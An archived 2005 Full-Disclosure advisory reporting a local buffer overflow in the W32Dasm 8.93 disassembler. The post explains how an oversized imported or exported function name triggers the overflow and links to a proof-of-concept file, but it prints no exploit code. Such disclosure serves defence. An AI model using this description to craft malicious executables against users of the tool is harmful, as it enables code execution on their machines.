Ethical Hacking

Learn to find vulnerabilities before the bad guys do! Gain real world hands on hacking experience in our state of the art hacking lab. Course designed and taught by expert instructors with years of penetration testing experience. 12 student maximum in every class. Certification attempt included in every package.
Computer Forensics Training at InfoSec Institute

Gain the in-demand skills of a certified computer examiner, learn to recover trace data left behind by fraud, theft, and cybercrime perpetrators. Discover the source of computer crime and abuse at your organization so that it never happens again. All of our class sizes are guaranteed to be 12 students or less to facilitate one-on-one interaction with one of our expert instructors.




Network Security Vuln-Dev
[Top] [All Lists]
<prev [Date] next>
[Advanced]
 <prev [Thread] next>

[Full-Disclosure] Local buffer-overflow in W32Dasm 8.93

from [Luigi Auriemma] Network Security [Permanent Link]
Subject: [Full-Disclosure] Local buffer-overflow in W32Dasm 8.93
Date: Mon, 24 Jan 2005 21:49:11 +0000 

#######################################################################

                             Luigi Auriemma

Application:  W32Dasm
              (was http://www.expage.com/page/w32dasm)
Versions:     <= 8.93 (8.94???)
Platforms:    Windows
Bug:          buffer-overflow
Exploitation: local
Date:         24 Jan 2005
Author:       Luigi Auriemma
              e-mail: aluigi@autistici.org
              web:    http://aluigi.altervista.org


#######################################################################


1) Introduction
2) Bug
3) The Code
4) Fix


#######################################################################

===============
1) Introduction
===============


W32Dasm is a cool and famous disassembler/debugger developed by URSoft.
It has tons of functions and, also if it is no longer supported by long
time, it is still widely used by a lot of people.


#######################################################################

======
2) Bug
======


The program uses the wsprintf() function to copy the name of the
imported/exported functions of the analyzed file into a buffer of only
256 bytes, with the possibility for an attacker to execute malicious
code.


#######################################################################

===========
3) The Code
===========


Exploiting the bug is very simple, all you need is to get an executable
and searching for the name of an imported or exported function to
modify.

I have written a very simple proof-of-concept that overwrites the
return address with 0xdeadc0de:

  http://aluigi.altervista.org/poc/w32dasmbof.disasm_me


#######################################################################

======
4) Fix
======


No fix.
This program is no longer supported.


#######################################################################


--- 
Luigi Auriemma
http://aluigi.altervista.org

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
[More with this subject...]




<Prev in Thread] Current Thread [Next in Thread>
  • [Full-Disclosure] Local buffer-overflow in W32Dasm 8.93, Luigi Auriemma <=
Previous by Date:  Re: [Full-Disclosure] 2 vulnerabilities combine to auto execute received files in Nokia series 60 OS, Anders Langworthy
Next by Date:  [Full-Disclosure] [ GLSA 200501-35 ] Evolution: Integer overflow in camel-lock-helper, Luke Macken
Previous by Thread:  [Full-Disclosure] SECURITY.NNOV: Multiple applications fd_set structure bitmap array index overflow, 3APA3A
Next by Thread:  [Full-Disclosure] [ GLSA 200501-35 ] Evolution: Integer overflow in camel-lock-helper, Luke Macken
Indexes:  [Date] [Thread] [Top] [All Lists]